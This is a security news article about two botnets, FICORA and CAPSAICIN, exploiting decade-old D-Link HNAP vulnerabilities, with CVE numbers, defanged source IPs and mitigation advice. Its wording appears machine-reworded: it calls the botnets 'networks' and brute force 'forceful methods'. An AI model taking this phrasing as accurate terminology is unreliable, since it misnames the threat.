An increase in cyber intrusions leveraging outdated weaknesses in D-Link routers has been identified, with two networks, FICORA and CAPSAICIN, actively capitalizing on these vulnerabilities.
Fortinet’s FortiGuard Labs researchers noticed a surge in activity from these networks during the months of October and November 2024, emphasizing the ongoing danger presented by obsolete and unpatched network devices.
Exploitation of Vulnerabilities from a Decade Ago
The networks take advantage of vulnerabilities in the Home Network Administration Protocol (HNAP) interface of D-Link routers, enabling malicious commands to be executed by remote attackers.
These security loopholes, identified by CVE numbers such as CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112, were disclosed many years ago yet remain a substantial threat due to the extensive usage of unpatched devices.
Despite fixes being accessible for many of these vulnerabilities, the continuous reliance on outdated hardware has presented an opportunity for cyber offenders to distribute malware on a large scale.
The FICORA network, a variation of the notorious Mirai malware, employs forceful methods to gain access to devices and uses high-level encryption (ChaCha20) to mask its setup and command-and-control (C2) details. It has the capacity to initiate distributed denial-of-service (DDoS) assaults utilizing various protocols, including UDP and TCP.
On the other hand, the CAPSAICIN network based on Kaiten prioritizes swift deployment and eradicates rival malware on infected devices to retain control.
FortiGuard Labs determined that the FICORA network was propagated from servers located in the Netherlands (e.g., IPs 185[.]191[.]126[.]213 and 185[.]191[.]126[.]248). The attacks were global, indicating they were not specific but rather opportunistic campaigns designed to exploit any susceptible device.
Both networks emphasize the risks associated with archaic network hardware. While these vulnerabilities have been acknowledged for years, many organizations have neglected to apply updates or replace obsolete devices. This neglect has allowed attackers to repeatedly capitalize on these vulnerabilities.
Experts strongly recommend that enterprises and individuals take preemptive actions to mitigate these risks:
- Regular Maintenance: Ensure that all routers and network devices are operating on the latest firmware versions.
- Hardware Renewal: Replace end-of-life (EOL) hardware that is no longer receiving security updates.
- Network Surveillance: Implement comprehensive surveillance solutions to detect abnormal traffic patterns indicative of network exploitation.
- Access Controls: Deactivate remote management features unless essential and utilize robust, unique passwords for device access.
Organizations must prioritize the updating or replacing of vulnerable devices to prevent inadvertent involvement in network intrusion campaigns orchestrated by networks.
The article “D-Link Routers Under Attack – Networks Capitalizing on Devices to Acquire Unrestricted Remote Authority” was first published on Cyber Security News.